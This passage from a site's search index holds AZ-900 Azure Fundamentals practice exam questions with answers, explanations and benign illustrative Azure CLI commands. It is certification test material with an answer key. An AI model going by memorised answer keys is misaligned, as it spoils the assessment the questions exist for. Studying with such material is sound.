        • vertical scaling

        You scale vertically to increase compute capacity by adding RAM or CPUs to a virtual machine. Scaling horizontally increases compute capacity by adding instances of resources, such as adding virtual machines to the configuration. Disaster recovery keeps data and other assets safe in the event of a disaster. High availability minimizes downtime when things go wrong. Describe the benefits of using cloud services - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-5-of-50","title":"Question 5 of 50","text":"

        Select the answer that correctly completes the sentence.

        Deploying and configuring cloud-based resources quickly as business requirements change is called\u00a0(------Your Answer Here -------).

        • agility

        Agility means that you can deploy and configure cloud-based resources quickly as app requirements change. Scalability means that you can add RAM, CPU, or entire virtual machines to a configuration. Elasticity means that you can configure cloud-based apps to take advantage of autoscaling, so apps always have the resources they need. High availability means that cloud-based apps can provide a continuous user experience with no apparent downtime, even when things go wrong. Describe the benefits of using cloud services - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-6-of-50","title":"Question 6 of 50","text":"

        What are cloud-based backup services, data replication, and geo-distribution features of?

        • a disaster recovery plan

        Disaster recovery uses services, such as cloud-based backup, data replication, and geo-distribution, to keep data and code safe in the event of a disaster. Describe the benefits of using cloud services - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-7-of-50","title":"Question 7 of 50","text":"

        What is high availability in a public cloud environment dependent on?

        • the service-level agreement (SLA) that you choose

        Different services have different SLAs. Sometimes different tiers of the same service will offer different SLAs, which can increase or decrease the promised availability. Describe the benefits of using cloud services - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-8-of-50","title":"Question 8 of 50","text":"

        Select the answer that correctly completes the sentence.

        An example of\u00a0(------Your Answer Here -------)\u00a0is automatically scaling an application to ensure that the application has the resources needed to meet customer demands.

        • elasticity

        Elasticity refers to the ability to scale resources as needed, such as during business hours, to ensure that an application can keep up with demand, and then reducing the available resources during off-peak hours. Agility refers to the ability to deploy new applications and services quickly. High availability refers to the ability to ensure that a service or application remains available in the event of a failure. Geo-distribution makes a service or application available in multiple geographic locations that are typically close to your users. Describe the benefits of using cloud services - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-9-of-50","title":"Question 9 of 50","text":"

        Select the answer that correctly completes the sentence.

        Increasing the capacity of an application by adding additional virtual machines is called\u00a0(------Your Answer Here -------).

        • horizontal scaling

        Scaling horizontally increases compute capacity by adding instances of resources, such as adding virtual machines to the configuration. You scale vertically to increase compute capacity by adding RAM or CPUs to a virtual machine. Agility refers to the ability to deploy new applications and services quickly. High availability minimizes downtime when things go wrong. Describe the benefits of using cloud services - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-10-of-50","title":"Question 10 of 50","text":"

        In a platform as a service (PaaS) model, which two components are the responsibility of the cloud service provider? Each correct answer presents a complete solution.

        • operating system
        • physical network

        In PaaS, the cloud provider is responsible for the operating system, physical datacenter, physical hosts, and physical network. In PaaS, the customer is responsible for accounts and identities. Describe cloud service types - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-11-of-50","title":"Question 11 of 50","text":"

        Which type of cloud service model is typically licensed through a monthly or annual subscription?

        • software as a service (SaaS)

        SaaS is software that is centrally hosted and managed for you and your users or customers. Usually, one version of the application is used for all customers, and it is licensed through a monthly or annual subscription. PaaS and IaaS use a consumption-based model, so you only pay for what you use. Describe cloud service types - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-12-of-50","title":"Question 12 of 50","text":"

        In which cloud service model is the customer responsible for managing the operating system?

        • Infrastructure as a service (IaaS)

        IaaS consists of virtual machines and networking provided by the cloud provider. The customer is responsible for the OS and applications. The cloud provider is responsible for the OS in PaaS and SaaS. Describe cloud service types - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-13-of-50","title":"Question 13 of 50","text":"

        What is the customer responsible for in a software as a service (SaaS) model?

        • data and access

        SaaS allows you to pay to use an existing application on hardware managed by a third party. You supply data and configure access. Customers are only responsible for storage in a private cloud. Customers are responsible for virtual machines and runtime in IaaS and the private cloud. Describe cloud service types - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-14-of-50","title":"Question 14 of 50","text":"

        What uses the infrastructure as a service (IaaS) cloud service model?

        • Azure virtual machines

        Azure Virtual Machines is an IaaS offering. The customer is responsible for the configuration of the virtual machine as well as all operating system configurations. Azure App Services and Azure Cosmos DB are PaaS offerings. Microsoft Office 365 is a SaaS offering. Describe cloud service types - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-15-of-50","title":"Question 15 of 50","text":"

        Select the answer that correctly completes the sentence.

        (------Your Answer Here -------) is the logical container used to combine and organize Azure resources.

        • a resource group

        Resources are combined into resource groups, which act as a logical container into which Azure resources like web apps, databases, and storage accounts, are deployed and managed. Describe the core architectural components of Azure - Training | Microsoft Learn
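        For illustration (not part of the original question set), a minimal Azure CLI sketch of creating a resource group and deploying a resource into it; rg-demo, stdemo001, and eastus are placeholder names:

        ```bash
        # Create a logical container for related resources (names are hypothetical)
        az group create --name rg-demo --location eastus

        # Deploy a resource into that group; location defaults to the group's location
        az storage account create --name stdemo001 --resource-group rg-demo --sku Standard_LRS
        ```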

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-16-of-50","title":"Question 16 of 50","text":"

        Select the answer that correctly completes the sentence.

        In a region pair, a region is paired with another region in the same (------Your Answer Here -------).

        • geography

        Each Azure region is always paired with another region within the same geography, such as US, Europe, or Asia, at least 300 miles away. Describe the core architectural components of Azure - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-17-of-50","title":"Question 17 of 50","text":"

        What is an Azure Storage account named storage001 an example of?

        • a resource

        A resource is a manageable item that is available through Azure. Virtual machines, storage accounts, web apps, databases, and virtual networks are examples of resources. Describe the core architectural components of Azure - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-18-of-50","title":"Question 18 of 50","text":"

        For which resource does Azure generate separate billing reports and invoices by default?

        • subscriptions

        Azure generates separate billing reports and invoices for each subscription so that you can organize and manage costs. Resource groups can be used to group costs, but you will not receive a separate invoice for each resource group. Management groups are used to efficiently manage access, policies, and compliance for subscriptions. You can set up billing profiles to roll up subscriptions into invoice sections, but this requires customization. Describe the core architectural components of Azure - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-19-of-50","title":"Question 19 of 50","text":"

        Which resource can you use to manage access, policies, and compliance across multiple subscriptions?

        • management groups

        Management groups can be used in environments that have multiple subscriptions to streamline the application of governance conditions. Resource groups can be used to organize Azure resources. Administrative units are used to delegate the administration of Azure AD resources, such as users and groups. Accounts are used to provide access to resources.

        Describe the core architectural components of Azure - Training | Microsoft Learn
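        As a hedged illustration, creating a management group and moving a subscription under it with Azure CLI might look like this; the group name and subscription ID are placeholders:

        ```bash
        # Create a management group and attach a subscription to it
        az account management-group create --name contoso-mg --display-name "Contoso"
        az account management-group subscription add --name contoso-mg \
          --subscription 00000000-0000-0000-0000-000000000000
        ```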

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-20-of-50","title":"Question 20 of 50","text":"

        Select the answer that correctly completes the sentence.

        (------Your Answer Here -------) is the deployment and management service for Azure.

        • Azure Resource Manager (ARM)

        ARM is the deployment and management service for Azure. It provides a management layer that enables you to create, update, and delete resources in an Azure subscription. You use management features, such as access control, resource locks, and resource tags, to secure and organize resources after deployment. Describe the core architectural components of Azure - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-21-of-50","title":"Question 21 of 50","text":"

        What can you use to execute code in a serverless environment?

        • Azure Functions

        Azure Functions allows you to run code as a service without having to manage the underlying platform or infrastructure. Azure Logic Apps is similar to Azure Functions, but uses predefined workflows instead of developing your own code. Describe Azure compute and networking services - Training | Microsoft Learn
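        For context, a minimal sketch of creating a consumption-plan (serverless) function app with Azure CLI; all names are placeholders, and the command assumes an existing storage account:

        ```bash
        # Create a serverless function app billed per execution (names are hypothetical)
        az functionapp create --resource-group rg-demo --name func-demo \
          --storage-account stdemo001 --consumption-plan-location eastus \
          --runtime python --functions-version 4
        ```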

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-22-of-50","title":"Question 22 of 50","text":"

        What can you use to connect Azure resources, such as Azure SQL databases, to an Azure virtual network?

        • service endpoints

        Service endpoints are used to expose Azure services to a virtual network, providing communication between the two. ExpressRoute is used to connect an on-premises network to Azure. NSGs allow you to configure inbound and outbound rules for virtual networks and virtual machines. Peering allows you to connect virtual networks together. Describe Azure compute and networking services - Training | Microsoft Learn
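        A minimal sketch of enabling a service endpoint on a subnet with Azure CLI, assuming an existing virtual network; all names are placeholders:

        ```bash
        # Expose Azure SQL to this subnet via a service endpoint
        az network vnet subnet update --resource-group rg-demo \
          --vnet-name vnet-demo --name subnet-apps \
          --service-endpoints Microsoft.Sql
        ```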

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-23-of-50","title":"Question 23 of 50","text":"

        Which two services can you use to establish network connectivity between an on-premises network and Azure resources? Each correct answer presents a complete solution.

        • Azure VPN Gateway
        • ExpressRoute

        ExpressRoute connections and Azure VPN Gateway are two services that you can use to connect an on-premises network to Azure. Bastion provides a web interface to remotely administer Azure virtual machines by using SSH/RDP. Azure Firewall is a stateful firewall service used to protect virtual networks. Azure ExpressRoute: Connectivity models | Microsoft Learn. Describe Azure compute and networking services - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-24-of-50","title":"Question 24 of 50","text":"

        Which storage service should you use to store thousands of files containing text and images?

        • Azure Blob storage

        Azure Blob storage is an object storage solution that you can use to store massive amounts of unstructured data, such as text or binary data. Describe Azure storage services - Training | Microsoft Learn
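        For illustration, uploading text and image files to a blob container with Azure CLI; account and container names are placeholders, and --auth-mode login assumes you hold a data-plane RBAC role on the account:

        ```bash
        # Upload a document and an image as block blobs
        az storage blob upload --account-name stdemo001 --container-name docs \
          --name report.txt --file ./report.txt --auth-mode login
        az storage blob upload --account-name stdemo001 --container-name docs \
          --name logo.png --file ./logo.png --auth-mode login
        ```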

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-25-of-50","title":"Question 25 of 50","text":"

        Which Azure Blob storage tier stores data offline and offers the lowest storage costs and the highest costs to access data?

        • Archive

        The Archive storage tier stores data offline and offers the lowest storage costs, but also the highest costs to rehydrate and access data. The Hot storage tier is optimized for storing data that is accessed frequently. Data in the Cool access tier can tolerate slightly lower availability, but still requires high durability, retrieval latency, and throughput characteristics similar to hot data. Describe Azure storage services - Training | Microsoft Learn
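        A hedged sketch of moving a blob offline to the Archive tier with Azure CLI (names are placeholders); note that rehydrating an archived blob back to Hot or Cool can take hours:

        ```bash
        # Send a rarely accessed blob to the cheapest (offline) tier
        az storage blob set-tier --account-name stdemo001 --container-name backups \
          --name backup-2023.tar.gz --tier Archive --auth-mode login
        ```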

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-26-of-50","title":"Question 26 of 50","text":"

        Which storage service offers fully managed file shares in the cloud that are accessible by using Server Message Block (SMB) protocol?

        • Azure Files

        Azure Files offers fully managed file shares in the cloud with shares that are accessible by using Server Message Block (SMB) protocol. Mounting Azure file shares is just like connecting to shares on a local network. Describe Azure storage services - Training | Microsoft Learn
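        As an illustrative sketch, mounting an Azure file share over SMB from a Linux host; the account, share, and key are placeholders, and the host needs cifs-utils installed plus outbound port 445:

        ```bash
        # Mount the share like any local network share
        sudo mkdir -p /mnt/myshare
        sudo mount -t cifs //stdemo001.file.core.windows.net/myshare /mnt/myshare \
          -o vers=3.1.1,username=stdemo001,password="$STORAGE_KEY",serverino
        ```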

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-27-of-50","title":"Question 27 of 50","text":"

        Which two scenarios are common use cases for Azure Blob storage? Each correct answer presents a complete solution.

        • serving images or documents directly to a browser
        • storing data for backup and restore

        Low storage costs and unlimited file formats make blob storage a good location to store backups and archives. Blob storage can be reached from anywhere by using an internet connection. Azure Disk Storage provides disks for Azure virtual machines. Azure Files supports mounting file storage shares. Describe Azure storage services - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-28-of-50","title":"Question 28 of 50","text":"

        Which Azure Blob storage service tier has the highest storage costs and the fastest access times for reading and writing data?

        • Hot

        The Hot tier is optimized for storing data that is accessed frequently. The Cool access tier has a slightly lower availability SLA and higher access costs compared to hot data, which are acceptable trade-offs for lower storage costs. Archive storage stores data offline and offers the lowest storage costs, but also the highest costs to rehydrate and access data. Describe Azure storage services - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-29-of-50","title":"Question 29 of 50","text":"

        Which two protocols are used to access Azure file shares? Each correct answer presents a complete solution.

        • Network File System (NFS)
        • Server Message Block (SMB)

        Azure Files offers fully managed file shares in the cloud that are accessible via industry-standard SMB and NFS protocols. Describe Azure storage services - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-30-of-50","title":"Question 30 of 50","text":"

        What enables a user to sign in one time and use that credential to access multiple resources and applications from different providers?

        • single sign-on (SSO)

        SSO enables a user to sign in one time and use that credential to access multiple resources and applications from different providers. MFA is a process whereby a user is prompted during the sign-in process for an additional form of identification. Conditional Access is a tool that Azure AD uses to allow or deny access to resources based on identity signals. Azure AD supports the registration of devices. Describe Azure identity, access, and security - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-31-of-50","title":"Question 31 of 50","text":"

        What can you use to allow a user to manage all the resources in a resource group?

        • Azure role-based access control (RBAC)

        Azure RBAC allows you to assign a set of permissions to a user or group. Resource tags are used to locate and act on resources associated with specific workloads, environments, business units, and owners. Resource locks prevent the accidental change or deletion of a resource. Key Vault is a centralized cloud service for storing application secrets in a single, central location. Describe Azure identity, access, and security - Training | Microsoft Learn
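        For illustration, a minimal Azure RBAC assignment with Azure CLI that scopes the Contributor role to one resource group; the user, subscription ID, and group name are placeholders:

        ```bash
        # Let one user manage everything inside a single resource group
        az role assignment create --assignee user@contoso.com --role "Contributor" \
          --scope "/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg-demo"
        ```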

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-32-of-50","title":"Question 32 of 50","text":"

        Which type of strategy uses a series of mechanisms to slow the advancement of an attack that aims to gain unauthorized access to data?

        • defense in depth

        A defense in depth strategy uses a series of mechanisms to slow the advancement of an attack that aims to gain unauthorized access to data. The principle of least privilege means restricting access to information to only the level that users need to perform their work. A DDoS attack attempts to overwhelm and exhaust an application's resources. The perimeter layer is about protecting an organization's resources from network-based attacks. Describe Azure identity, access, and security - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-33-of-50","title":"Question 33 of 50","text":"

        Which two services are provided by Azure AD? Each correct answer presents a complete solution.

        • authentication
        • single sign-on (SSO)

        Azure AD provides services for verifying identity and access to applications and resources. SSO enables you to remember a single username and password to access multiple applications and is available in Azure AD. Describe Azure identity, access, and security - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-34-of-50","title":"Question 34 of 50","text":"

        You have an Azure virtual machine that is accessed only between 9:00 and 17:00 each day.

        What should you do to minimize costs but preserve the associated hard disks and data?

        • Resize the virtual machine. This answer is incorrect.

        • Deallocate the virtual machine. This answer is correct.

        If you have virtual machine workloads that are used only during certain periods but you run them every hour of every day, you are wasting money. These virtual machines are great candidates to deallocate when not in use and start back up when required, which saves compute costs while the virtual machines are deallocated. Describe cost management in Azure - Training | Microsoft Learn
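        A minimal sketch of the deallocate/start cycle with Azure CLI (names are placeholders); deallocating stops compute billing while disks and data are preserved:

        ```bash
        # After 17:00: stop compute billing but keep the disks
        az vm deallocate --resource-group rg-demo --name vm-demo

        # Before 09:00: bring the machine back
        az vm start --resource-group rg-demo --name vm-demo
        ```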

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-35-of-50","title":"Question 35 of 50","text":"

        You need to associate the costs of resources to different groups within an organization without changing the location of the resources. What should you use?

        • subscriptions. This answer is incorrect.

        • resource tags. This answer is correct.

        Resource tags can be used to group billing data and categorize costs by runtime environment, such as billing usage for virtual machines running in a production environment. Tag resources, resource groups, and subscriptions for logical organization - Azure Resource Manager | Microsoft Learn. Describe the purpose of tags - Training | Microsoft Learn
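        For context, a hedged Azure CLI sketch of tagging a resource group so its costs can be grouped in billing data; names and tag values are placeholders:

        ```bash
        # Tags flow into cost reports without moving or changing the resources
        az group update --name rg-demo \
          --set tags.CostCenter=Finance tags.Environment=Production
        ```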

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-36-of-50","title":"Question 36 of 50","text":"

        Your organization plans to deploy several production virtual machines that will have consistent resource usage throughout the year. What can you use to minimize the costs of the virtual machines without reducing the functionality of the virtual machines?

        • Azure Reservations

        Azure Reservations offers discounted prices on certain Azure services. Azure Reservations can save you up to 72 percent compared to pay-as-you-go prices. To receive a discount, you can reserve services and resources by paying in advance. Spending limits can suspend a subscription when the spend limit is reached. Describe cost management in Azure - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-37-of-50","title":"Question 37 of 50","text":"

        What can be applied to a resource to prevent accidental deletion?

        • a resource lock

        A resource lock prevents resources from being accidentally deleted or changed. Resource tags offer the custom grouping of resources. Policies enforce different rules across all resource configurations so that the configurations stay compliant with corporate standards. An initiative is a way of grouping related policies together. Describe features and tools in Azure for governance and compliance - Training | Microsoft Learn
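        A minimal sketch of applying a delete lock with Azure CLI; the lock and group names are placeholders:

        ```bash
        # Block deletion of everything in the group until the lock is removed
        az lock create --name no-delete --lock-type CanNotDelete --resource-group rg-demo
        ```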

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-38-of-50","title":"Question 38 of 50","text":"

        You need to recommend a solution for Azure virtual machine deployments. The solution must enforce company standards on the virtual machines. What should you include in the recommendation?

        • Azure Blueprints. This answer is incorrect.

        • Azure Policy. This answer is correct.

        Azure policies will allow you to enforce company standards on new virtual machines when combined with Azure VM Image Builder and Azure Compute Gallery. By using Azure Policy and role-based access control (RBAC) assignments, enterprises can enforce standards on Azure resources. But on virtual machines, these mechanisms only affect the control plane or the route to the virtual machine. Describe features and tools in Azure for governance and compliance - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-39-of-50","title":"Question 39 of 50","text":"

        You need to ensure that multi-factor authentication (MFA) is enabled on accounts with write permissions in an Azure subscription. What should you implement?

        • Azure Policy

        Azure Policy is a service in Azure that enables you to create, assign, and manage policies that control or audit resources. Describe features and tools in Azure for governance and compliance - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-40-of-50","title":"Question 40 of 50","text":"

        What can you use to restrict the deployment of a virtual machine to a specific location?

        • Azure Policy

        Azure Policy can help to create a policy for allowed regions, which enables you to restrict the deployment of virtual machines to a specific location. Overview of Azure Policy - Azure Policy | Microsoft Learn. Describe the purpose of Azure Policy - Training | Microsoft Learn
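        As a hedged illustration, assigning the built-in "Allowed locations" policy at resource group scope with Azure CLI; the definition GUID and all names below are assumptions to verify in your own tenant:

        ```bash
        # Look up the definition ID first if in doubt:
        #   az policy definition list --query "[?displayName=='Allowed locations'].name"
        az policy assignment create --name allowed-locations --resource-group rg-demo \
          --policy e56962a6-4747-49cd-b67b-bf8b01975c4c \
          --params '{"listOfAllowedLocations":{"value":["eastus","westus"]}}'
        ```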

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-41-of-50","title":"Question 41 of 50","text":"

        Which management layer accepts requests from any Azure tool or API and enables you to create, update, and delete resources in an Azure account?

        • Azure Resource Manager (ARM)

        ARM is the deployment and management service for Azure. It provides a management layer that enables you to create, update, and delete resources in an Azure account. Describe features and tools for managing and deploying Azure resources - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-42-of-50","title":"Question 42 of 50","text":"

        What can you use to manage servers across cloud platforms and on-premises environments?

        • Azure Arc

        Azure Arc simplifies governance and management by delivering a consistent multi-cloud and on-premises management platform. Describe features and tools for managing and deploying Azure resources - Training | Microsoft Learn. Describe the purpose of Azure Arc - Training | Microsoft Learn.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-43-of-50","title":"Question 43 of 50","text":"

        What provides recommendations to reduce the cost of Azure resources?

        • Azure Advisor

        Azure Advisor analyzes the account usage and makes recommendations based on its set and configured rules. Describe monitoring tools in Azure - Training | Microsoft Learn
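        For illustration, the same recommendations can be pulled from the command line; a minimal sketch:

        ```bash
        # List Advisor cost recommendations for the current subscription
        az advisor recommendation list --category Cost --output table
        ```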

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-44-of-50","title":"Question 44 of 50","text":"

        You have a team of Linux administrators that need to manage the resources in Azure. The team wants to use the Bash shell to perform the administration. What should you recommend?

        • Azure CLI

        Azure CLI allows you to use the Bash shell to perform administrative tasks. Bash is used in Linux environments, so a Linux administrator will probably be more comfortable performing command-line administration from Azure CLI. Describe features and tools for managing and deploying Azure resources - Training | Microsoft Learn
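        A short sketch of what such a Bash session might look like (resource names are placeholders):

        ```bash
        az login                                   # authenticate interactively
        az group list --output table               # enumerate resource groups
        az vm list --show-details --output table   # inspect virtual machines
        ```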

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-45-of-50","title":"Question 45 of 50","text":"

        You need to create a custom solution that uses thresholds to trigger autoscaling functionality to scale an app up or down to meet user demand. What should you include in the solution?

        • Application insights. This answer is incorrect.

        • Azure Monitor. This answer is correct.

        Azure Monitor is a platform that collects metric and logging data, such as CPU percentages. The data can be used to trigger autoscaling. Describe monitoring tools in Azure - Training | Microsoft Learn
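        For context, a hedged Azure CLI sketch of a threshold-based autoscale rule driven by Azure Monitor metrics, here against a hypothetical VM scale set; all names and thresholds are placeholders:

        ```bash
        # Create an autoscale profile, then add a scale-out rule on CPU
        az monitor autoscale create --resource-group rg-demo \
          --resource vmss-demo --resource-type Microsoft.Compute/virtualMachineScaleSets \
          --name autoscale-demo --min-count 2 --max-count 10 --count 2
        az monitor autoscale rule create --resource-group rg-demo \
          --autoscale-name autoscale-demo \
          --condition "Percentage CPU > 70 avg 5m" --scale out 1
        ```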

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-46-of-50","title":"Question 46 of 50","text":"

        What should you proactively review and act on to avoid service interruptions, such as service retirements and breaking changes?

        • Azure Monitor. This answer is incorrect.

        • health advisories. This answer is correct.

        Health advisories are issues that require that you take proactive action to avoid service interruptions, such as service retirements and breaking changes. Service issues are problems such as outages that require immediate actions. Describe monitoring tools in Azure - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-47-of-50","title":"Question 47 of 50","text":"

        What can you use to get notification about an outage in a specific Azure region?

        • Azure Service Health

        Service Health notifies you of Azure-related service issues, such as region-wide downtime. Describe monitoring tools in Azure - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-48-of-50","title":"Question 48 of 50","text":"

        Which Azure service can generate an alert if virtual machine utilization is over 80% for five minutes?

        • Azure Monitor

        Azure Monitor is a platform for collecting, analyzing, visualizing, and alerting based on metrics. Azure Monitor can log data from an entire Azure and on-premises environment. Describe monitoring tools in Azure - Training | Microsoft Learn
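        A minimal sketch of exactly this alert with Azure CLI (names are placeholders):

        ```bash
        # Fire an alert when average CPU stays above 80% for five minutes
        VM_ID=$(az vm show --resource-group rg-demo --name vm-demo --query id --output tsv)
        az monitor metrics alert create --name cpu-over-80 --resource-group rg-demo \
          --scopes "$VM_ID" --condition "avg Percentage CPU > 80" \
          --window-size 5m --evaluation-frequency 1m
        ```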

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-49-of-50","title":"Question 49 of 50","text":"

        What can you apply to an Azure virtual machine to ensure that users cannot change or delete the resource?

        • a lock

        Protect your Azure resources with a lock - Azure Resource Manager | Microsoft Learn Describe features and tools in Azure for governance and compliance - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-50-of-50","title":"Question 50 of 50","text":"

        Which feature in the Microsoft Purview governance portal should you use to manage access to data sources and datasets?

        • Data Estate Insights. This answer is incorrect.
        • Data Policy. This answer is correct.

        Incorrect: Data Catalog - This enables data discovery. Incorrect: Data Sharing - This shares data within and between organizations. Incorrect: Data Estate Insights - This assesses data estate health. Correct: Data Policy - This governs access to data.

        Introduction to Microsoft Purview governance solutions - Microsoft Purview | Microsoft Learn. Describe features and tools in Azure for governance and compliance - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#exams-from-course-az-900-microsoft-azure-fundamentals-original-practice-tests","title":"Exams from \"Course AZ-900: Microsoft Azure Fundamentals Original Practice Tests\"","text":"

        Exams from the Udemy course AZ-900: Microsoft Azure Fundamentals Original Practice Tests.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#test-1","title":"Test 1","text":"","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-1-which-azure-feature-is-specifically-designed-to-help-companies-get-their-in-house-developed-code-from-the-code-repository-through-automated-unit-testing-and-onto-azure-using-a-service-called-pipelines","title":"Question 1:\u00a0Which Azure feature is specifically designed to help companies get their in-house developed code from the code repository, through automated unit testing, and onto Azure using a service called Pipelines?","text":"
        • Azure Monitor
        • GitHub
        • Azure DevOps
        • Virtual Machines

        Explanation: Azure DevOps contains many services, one of which is Pipelines. Pipelines allows you to build an automation that moves code (and all related dependencies) through various stages from the development environment into deployment.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-2-true-or-false-there-are-no-service-level-guarantees-sla-when-a-service-is-in-general-availability-ga","title":"Question 2: True or false: there are no service level guarantees (SLA) when a service is in General Availability (GA)","text":"
        • FALSE
        • TRUE

        Explanation: False, most Azure GA services do have service level agreements. See:\u00a0https://azure.microsoft.com/en-ca/support/legal/sla/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-3-which-ways-does-the-azure-resource-manager-model-provide-to-deploy-resources","title":"Question 3:\u00a0Which ways does the Azure Resource Manager model provide to deploy resources?","text":"
        • CLI
        • PowerShell
        • Azure Portal
        • REST API / SDK

        Explanation: Azure Resource Manager (ARM) is the deployment and management service for Azure. It provides a management layer that enables you to create, update, and delete resources in your Azure account. The ARM model allows you to work with resources in a consistent manner, whether through Azure portal, PowerShell, REST APIs/SDKs, or the Command-Line Interface (CLI).

        1. Azure Portal: This is a web-based, unified console that provides an alternative to command-line tools. You can manage your Azure resources directly through a GUI.

        2. PowerShell: Azure PowerShell is a module that provides cmdlets to manage Azure through Windows PowerShell and PowerShell Core. You can use it to build scripts for managing and automating your Azure resources.

        3. REST API / SDK: Azure provides comprehensive REST APIs that can be used directly or via Azure SDKs available in multiple languages. This allows developers to integrate Azure services in their applications, services, or tools.

        4. CLI: Azure CLI is a cross-platform command-line program that connects to Azure and executes administrative commands on Azure resources. It's designed to make scripting easy, authenticate with the Azure platform, and quickly run commands to perform common administrative tasks or deploy to Azure.

        Each of these methods supports the full set of Azure Resource Manager features, and you can choose the one that best fits your workflow. See:\u00a0https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-4-what-type-of-container-is-used-to-collect-log-and-metric-data-from-various-azure-resources","title":"Question 4: What type of container is used to collect log and metric data from various Azure Resources?","text":"
        • Log Analytics Workspace
        • Managed Storage
        • Append Blob Storage
        • Azure Monitor account

        Explanation: Log Analytics Workspace is required to collect logs and metrics. See:\u00a0https://docs.microsoft.com/en-us/azure/azure-monitor/platform/manage-access

